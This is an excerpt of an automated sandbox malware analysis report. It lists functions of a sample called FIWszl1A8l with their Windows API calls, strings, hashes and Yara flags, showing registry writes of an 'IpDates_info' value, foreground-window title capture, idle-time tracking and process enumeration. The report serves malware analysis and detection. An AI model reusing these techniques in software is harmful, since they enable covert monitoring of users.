                                                                                                  • Opcode Fuzzy Hash: 7116c6567c25c093ed8706b1220974367d1102e1a5f63289df9d5aacd6d02f60
                                                                                                  • Instruction Fuzzy Hash: 4D512DB1E002159FDB14DFA4D888BEEB7B9EF58714F118119EA05A73A0D734ED05CBA1
                                                                                                  Function 009752B0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 123registrysleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 00975382
                                                                                                  • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 00975392
                                                                                                  • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,0098C6E0,000012A0), ref: 009753B0
                                                                                                  • RegCloseKey.KERNEL32(?), ref: 009753BB
                                                                                                  • OpenProcess.KERNEL32(00000400,00000000,?), ref: 0097540F
                                                                                                  • GetExitCodeProcess.KERNEL32(00000000,?), ref: 0097541B
                                                                                                  • Sleep.KERNEL32(00000BB8), ref: 00975434
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                                                                                  • String ID: IpDates_info$SOFTWARE
                                                                                                  • API String ID: 864241144-2243437601
                                                                                                  • Opcode ID: 07730cdfd9f608883fca0becfa8c3b8de239232b7bdeed08d0f0ae094386f43c
                                                                                                  • Instruction ID: 558965c34c611017b11bb6df2baeaf53bdefb5b0344f506d675828bc110840f8
                                                                                                  • Opcode Fuzzy Hash: 07730cdfd9f608883fca0becfa8c3b8de239232b7bdeed08d0f0ae094386f43c
                                                                                                  • Instruction Fuzzy Hash: A74117B364C641DBD3509F348C49B7A7BA9AB51344FAE8458F58DDA2A2D3F0D805C3A2
                                                                                                  Function 009752D9 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 84registrysleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 00975382
                                                                                                  • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 00975392
                                                                                                  • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,0098C6E0,000012A0), ref: 009753B0
                                                                                                  • RegCloseKey.KERNEL32(?), ref: 009753BB
                                                                                                  • OpenProcess.KERNEL32(00000400,00000000,?), ref: 0097540F
                                                                                                  • GetExitCodeProcess.KERNEL32(00000000,?), ref: 0097541B
                                                                                                  • Sleep.KERNEL32(00000BB8), ref: 00975434
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                                                                                  • String ID: IpDates_info$SOFTWARE
                                                                                                  • API String ID: 864241144-2243437601
                                                                                                  • Opcode ID: ec441cdbb7529eff906fdabb3b09756d72656f41fc86158d5ff143c826c358b1
                                                                                                  • Instruction ID: f9f9a6ed43abf667fd8ac65fc1cc564d9c0c5a30511becfa4465088a0508c3c5
                                                                                                  • Opcode Fuzzy Hash: ec441cdbb7529eff906fdabb3b09756d72656f41fc86158d5ff143c826c358b1
                                                                                                  • Instruction Fuzzy Hash: 9B31D27224C781DFD760CF708C08F7A7BA9AB55344FAE8488F18D9A2A2C3E0D806C751
                                                                                                  Function 02D0CA70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,000F003F,02D212F8,7A8163DF,00000001,00000000,00000000), ref: 02D0CAB1
                                                                                                  • RegQueryInfoKeyW.ADVAPI32(02D212F8,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 02D0CAE0
                                                                                                  • _memset.LIBCMT ref: 02D0CB44
                                                                                                  • _memset.LIBCMT ref: 02D0CB53
                                                                                                  • RegEnumValueW.KERNEL32(02D212F8,?,00000000,?,00000000,?,00000000,?), ref: 02D0CB72
                                                                                                    • Part of subcall function 02D0F707: _malloc.LIBCMT ref: 02D0F721
                                                                                                    • Part of subcall function 02D0F707: std::exception::exception.LIBCMT ref: 02D0F756
                                                                                                    • Part of subcall function 02D0F707: std::exception::exception.LIBCMT ref: 02D0F770
                                                                                                    • Part of subcall function 02D0F707: __CxxThrowException@8.LIBCMT ref: 02D0F781
                                                                                                  • RegCloseKey.KERNEL32(02D212F8,?,?,?,?,?,?,?,?,?,?,?,00000000,02D212F8,000000FF), ref: 02D0CC83
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memsetstd::exception::exception$CloseEnumException@8InfoOpenQueryThrowValue_malloc
                                                                                                  • String ID: Console\0
                                                                                                  • API String ID: 1348767993-1253790388
                                                                                                  • Opcode ID: c3bd157b71f405809e530cea3b60c2bdd14b29f520f0ce55347069b83b29febb
                                                                                                  • Instruction ID: b4d218f9f834d85cfdd78e9ba57ba55db461571005e481ea587aabb91765c433
                                                                                                  • Opcode Fuzzy Hash: c3bd157b71f405809e530cea3b60c2bdd14b29f520f0ce55347069b83b29febb
                                                                                                  • Instruction Fuzzy Hash: 8F611EB1D00219AFDB14DFA8D881EAEB7B9FF48310F14466AF915A7391D734AD01CBA4
                                                                                                  Function 02D0BB00 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 126COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 02D0F707: _malloc.LIBCMT ref: 02D0F721
                                                                                                  • _memset.LIBCMT ref: 02D0BB21
                                                                                                  • GetLastInputInfo.USER32(?), ref: 02D0BB37
                                                                                                  • GetTickCount.KERNEL32 ref: 02D0BB3D
                                                                                                  • wsprintfW.USER32 ref: 02D0BB66
                                                                                                  • GetForegroundWindow.USER32 ref: 02D0BB6F
                                                                                                  • GetWindowTextW.USER32(00000000,00000020,000000FA), ref: 02D0BB83
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Window$CountForegroundInfoInputLastTextTick_malloc_memsetwsprintf
                                                                                                  • String ID: %d min
                                                                                                  • API String ID: 3754759880-1947832151
                                                                                                  • Opcode ID: d14e636c141408883cdcdcbdf59b0706c37dbd4b82d2864036c2dd725489ff85
                                                                                                  • Instruction ID: 4b997a6a44e421be642bc06aa3c263434f3ed4bd300651f844007f20728a317e
                                                                                                  • Opcode Fuzzy Hash: d14e636c141408883cdcdcbdf59b0706c37dbd4b82d2864036c2dd725489ff85
                                                                                                  • Instruction Fuzzy Hash: ED418EB5900214AFCB10DFA4D888B9FBBB9EF44714F148555F9099B3A1DB749E04CBE1
                                                                                                  Function 02D06D70 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 89registrystringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 02D06DD9
                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,02D25164,00000000,00020019,s<u), ref: 02D06DFC
                                                                                                  • RegQueryValueExW.KERNEL32(s<u,GROUP,00000000,00000001,?,00000208), ref: 02D06E4A
                                                                                                  • lstrcmpW.KERNEL32(?,02D25148), ref: 02D06E60
                                                                                                  • lstrcpyW.KERNEL32(02D056EA,?), ref: 02D06E72
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: OpenQueryValue_memsetlstrcmplstrcpy
                                                                                                  • String ID: GROUP$s<u
                                                                                                  • API String ID: 2102619503-3119169592
                                                                                                  • Opcode ID: 48feffedeebe7a6bbf7e1daaaca7c665837f6369432e5d6fdfaa1cb3d7e664bb
                                                                                                  • Instruction ID: e23ed2981163d645c0117a9b318f1200a96c6b2e27c58fc9ff8e60e300345e84
                                                                                                  • Opcode Fuzzy Hash: 48feffedeebe7a6bbf7e1daaaca7c665837f6369432e5d6fdfaa1cb3d7e664bb
                                                                                                  • Instruction Fuzzy Hash: A5319471940319ABDB30DF90ED89B9AB7B8EB08714F104299E519A6290DB74DE54CFA0
                                                                                                  Function 02D06910 Relevance: 12.1, APIs: 8, Instructions: 128COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetCurrentProcessId.KERNEL32(7A8163DF,00000000,00000000,753C73E0,?,00000000,02D210DB,000000FF,?,02D06AB3,00000000), ref: 02D06938
                                                                                                  • OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,02D210DB,000000FF,?,02D06AB3,00000000), ref: 02D06947
                                                                                                  • OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,02D210DB,000000FF,?,02D06AB3,00000000), ref: 02D06960
                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,02D210DB,000000FF,?,02D06AB3,00000000), ref: 02D0696B
                                                                                                  • SysStringLen.OLEAUT32(00000000), ref: 02D069BE
                                                                                                  • SysStringLen.OLEAUT32(00000000), ref: 02D069CC
                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,02D210DB,000000FF), ref: 02D06A2E
                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,02D210DB,000000FF), ref: 02D06A34
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandleProcess$OpenString$CurrentToken
                                                                                                  • String ID:
                                                                                                  • API String ID: 429299433-0
                                                                                                  • Opcode ID: 8fe60832a2d80cd51a8b83e3364c2985fcf28b69aa9f51ec47969341328b503f
                                                                                                  • Instruction ID: 9478718ffb4b7b06393fdfbef1737765c64a145d17d21e9ad4aa98ffcfabfbc0
                                                                                                  • Opcode Fuzzy Hash: 8fe60832a2d80cd51a8b83e3364c2985fcf28b69aa9f51ec47969341328b503f
                                                                                                  • Instruction Fuzzy Hash: F541B1B2D401189BDB10DFA9D884BAEB7B8FB44304F21462AE915E7790D7759D14CBE0
                                                                                                  Function 02D0FA29 Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___set_flsgetvalue.LIBCMT ref: 02D0FA4E
                                                                                                  • __calloc_crt.LIBCMT ref: 02D0FA5A
                                                                                                  • __getptd.LIBCMT ref: 02D0FA67
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,02D0F9C4,00000000,00000000,02D0E003), ref: 02D0FA9E
                                                                                                  • GetLastError.KERNEL32(?,00000000,?,?,02D0E003,00000000,00000000,02D05F40,00000000,00000000,00000000), ref: 02D0FAA8
                                                                                                  • _free.LIBCMT ref: 02D0FAB1
                                                                                                  • __dosmaperr.LIBCMT ref: 02D0FABC
                                                                                                    • Part of subcall function 02D0F91B: __getptd_noexit.LIBCMT ref: 02D0F91B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 155776804-0
                                                                                                  • Opcode ID: c7493d298567ee6e70e55e3e1f22d094864f49663c3c6c63d4ba9949c7bc7055
                                                                                                  • Instruction ID: bba59967a82d20c3eca0c744eeed664defca69162d219bf84a193f4bbf2d9a04
                                                                                                  • Opcode Fuzzy Hash: c7493d298567ee6e70e55e3e1f22d094864f49663c3c6c63d4ba9949c7bc7055
                                                                                                  • Instruction Fuzzy Hash: E011A032604716BFAB21AFA6AC84B9B379ADF44364B204425F90486BA0DF71DC018AB0
                                                                                                  Function 0097721B Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___set_flsgetvalue.LIBCMT ref: 00977240
                                                                                                  • __calloc_crt.LIBCMT ref: 0097724C
                                                                                                  • __getptd.LIBCMT ref: 00977259
                                                                                                  • CreateThread.KERNEL32(?,?,009771B6,00000000,?,?), ref: 00977290
                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 0097729A
                                                                                                  • _free.LIBCMT ref: 009772A3
                                                                                                  • __dosmaperr.LIBCMT ref: 009772AE
                                                                                                    • Part of subcall function 0097710D: __getptd_noexit.LIBCMT ref: 0097710D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 155776804-0
                                                                                                  • Opcode ID: 3a38458ae68315cfbac1849071454340f8b759ff2f864bf27e605b991850cbd3
                                                                                                  • Instruction ID: 302cace0bc135fa7290fb6d731845bb326425be96aa0a8d5aa1b3dc047a8551a
                                                                                                  • Opcode Fuzzy Hash: 3a38458ae68315cfbac1849071454340f8b759ff2f864bf27e605b991850cbd3
                                                                                                  • Instruction Fuzzy Hash: C31182331087066FDB11AFE59C46E9BB79CEF85764B118019F92C9A152EB71D81087B0
                                                                                                  Function 02D0F9C4 Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___set_flsgetvalue.LIBCMT ref: 02D0F9CA
                                                                                                    • Part of subcall function 02D13CA0: TlsGetValue.KERNEL32(00000000,02D13DF9,?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C,02D18E76,00000000,00000000), ref: 02D13CA9
                                                                                                    • Part of subcall function 02D13CA0: DecodePointer.KERNEL32(?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C,02D18E76,00000000,00000000,?,02D13F06,0000000D), ref: 02D13CBB
                                                                                                    • Part of subcall function 02D13CA0: TlsSetValue.KERNEL32(00000000,?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C,02D18E76,00000000,00000000,?,02D13F06), ref: 02D13CCA
                                                                                                  • ___fls_getvalue@4.LIBCMT ref: 02D0F9D5
                                                                                                    • Part of subcall function 02D13C80: TlsGetValue.KERNEL32(?,?,02D0F9DA,00000000), ref: 02D13C8E
                                                                                                  • ___fls_setvalue@8.LIBCMT ref: 02D0F9E8
                                                                                                    • Part of subcall function 02D13CD4: DecodePointer.KERNEL32(?,?,?,02D0F9ED,00000000,?,00000000), ref: 02D13CE5
                                                                                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 02D0F9F1
                                                                                                  • ExitThread.KERNEL32 ref: 02D0F9F8
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 02D0F9FE
                                                                                                  • __freefls@4.LIBCMT ref: 02D0FA1E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                  • String ID:
                                                                                                  • API String ID: 2383549826-0
                                                                                                  • Opcode ID: 4926136da2f0c11c224dbca85273d96d7bfdf21e50daad556e3f737e99d88b83
                                                                                                  • Instruction ID: 4734c861a8493caf24b3c9f8e52252cd4715abaa9d9d2bbc432a39e50e77d9e2
                                                                                                  • Opcode Fuzzy Hash: 4926136da2f0c11c224dbca85273d96d7bfdf21e50daad556e3f737e99d88b83
                                                                                                  • Instruction Fuzzy Hash: 4EF04F74940240BFC718AB61E54890E7BAAEF44340B218598E90587721DB34DC86CBA1
                                                                                                  Function 009771B6 Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___set_flsgetvalue.LIBCMT ref: 009771BC
                                                                                                    • Part of subcall function 00979754: TlsGetValue.KERNEL32(00000000,009798AD,?,00979FB0,00000000,00000001,00000000,?,0097C0CF,00000018,00987C70,0000000C,0097C15F,00000000,00000000), ref: 0097975D
                                                                                                    • Part of subcall function 00979754: DecodePointer.KERNEL32(?,00979FB0,00000000,00000001,00000000,?,0097C0CF,00000018,00987C70,0000000C,0097C15F,00000000,00000000,?,009799BA,0000000D), ref: 0097976F
                                                                                                    • Part of subcall function 00979754: TlsSetValue.KERNEL32(00000000,?,00979FB0,00000000,00000001,00000000,?,0097C0CF,00000018,00987C70,0000000C,0097C15F,00000000,00000000,?,009799BA), ref: 0097977E
                                                                                                  • ___fls_getvalue@4.LIBCMT ref: 009771C7
                                                                                                    • Part of subcall function 00979734: TlsGetValue.KERNEL32(?,?,009771CC,00000000), ref: 00979742
                                                                                                  • ___fls_setvalue@8.LIBCMT ref: 009771DA
                                                                                                    • Part of subcall function 00979788: DecodePointer.KERNEL32(?,?,?,009771DF,00000000,?,00000000), ref: 00979799
                                                                                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 009771E3
                                                                                                  • ExitThread.KERNEL32 ref: 009771EA
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 009771F0
                                                                                                  • __freefls@4.LIBCMT ref: 00977210
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                  • String ID:
                                                                                                  • API String ID: 2383549826-0
                                                                                                  • Opcode ID: 87e28972696d28b587dbc55f6a4d89d16097953bd81396cf3ed3d5b24bf771cd
                                                                                                  • Instruction ID: e809942c8aa3c890c98798c093d54528b0b777000cce53d464ef2c7bf7917679
                                                                                                  • Opcode Fuzzy Hash: 87e28972696d28b587dbc55f6a4d89d16097953bd81396cf3ed3d5b24bf771cd
                                                                                                  • Instruction Fuzzy Hash: 1FF09676518640ABC708BFB1CD49A5E7BA9EFC4304721C858F90C8B213DA34D8469790
                                                                                                  Function 02D06050 Relevance: 9.1, APIs: 6, Instructions: 86processCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 02D0607C
                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 02D06088
                                                                                                  • Process32FirstW.KERNEL32(00000000,00000000), ref: 02D060B9
                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 02D0610F
                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 02D06116
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 2526126748-0
                                                                                                  • Opcode ID: 65448a03b6cd785e0aea2eb64c5814ba77ad200356e82c860f552de613feb757
                                                                                                  • Instruction ID: 38dab732085ad6b8ee2743dbb50912357ff7bf6a250b92efe995c6f650704e71
                                                                                                  • Opcode Fuzzy Hash: 65448a03b6cd785e0aea2eb64c5814ba77ad200356e82c860f552de613feb757
                                                                                                  • Instruction Fuzzy Hash: D1219431A40124ABDB20EF74DC99FEE7369EF14314F204695EC09963D0EB359E24CAA1
                                                                                                  Function 009732E0 Relevance: 9.0, APIs: 6, Instructions: 32synchronizationsleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 009732F1
                                                                                                  • Sleep.KERNEL32(00000258), ref: 009732FE
                                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 00973306
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00973312
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0097331A
                                                                                                  • Sleep.KERNEL32(0000012C), ref: 0097332B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
                                                                                                  • String ID:
                                                                                                  • API String ID: 3137405945-0
                                                                                                  • Opcode ID: 0a1108a17aa8252d8f38f529e353875b74689ee4ee8dd241bc6beac09bb0eb37
                                                                                                  • Instruction ID: b595ec0a43246f2db2814960636e16f72cee9da398d9f995c23d7c2d584cb932
                                                                                                  • Opcode Fuzzy Hash: 0a1108a17aa8252d8f38f529e353875b74689ee4ee8dd241bc6beac09bb0eb37
                                                                                                  • Instruction Fuzzy Hash: FBF082722087046BD610ABA9DC84E86F3A8AF85330B21470DF225973E0CAB0E8058BA0
                                                                                                  Function 02D06690 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110comCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CoInitialize.OLE32(00000000), ref: 02D0669B
                                                                                                  • CoCreateInstance.OLE32(02D246FC,00000000,00000001,02D2471C,?,?,?,?,?,?,?,?,?,?,02D0588A), ref: 02D066B2
                                                                                                  • SysFreeString.OLEAUT32(?), ref: 02D0674C
                                                                                                  • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,02D0588A), ref: 02D0677D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateFreeInitializeInstanceStringUninitialize
                                                                                                  • String ID: FriendlyName
                                                                                                  • API String ID: 841178590-3623505368
                                                                                                  • Opcode ID: b2f26ffedb02a9d24f0b89c25b8ff2ebd52f2ea901456f331ced3f343e75acb4
                                                                                                  • Instruction ID: 016062413764a96c0e74b103b326c907621727bfa575d40dc26ba6f53b7e9257
                                                                                                  • Opcode Fuzzy Hash: b2f26ffedb02a9d24f0b89c25b8ff2ebd52f2ea901456f331ced3f343e75acb4
                                                                                                  • Instruction Fuzzy Hash: E7313B75A40205AFDB10DA98DC84FAAB7B9EFC8704F148598F905E7390DB71ED06CBA0
                                                                                                  Function 02D0F707 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 02D0F721
                                                                                                    • Part of subcall function 02D0F673: __FF_MSGBANNER.LIBCMT ref: 02D0F68C
                                                                                                    • Part of subcall function 02D0F673: __NMSG_WRITE.LIBCMT ref: 02D0F693
                                                                                                    • Part of subcall function 02D0F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C,02D18E76), ref: 02D0F6B8
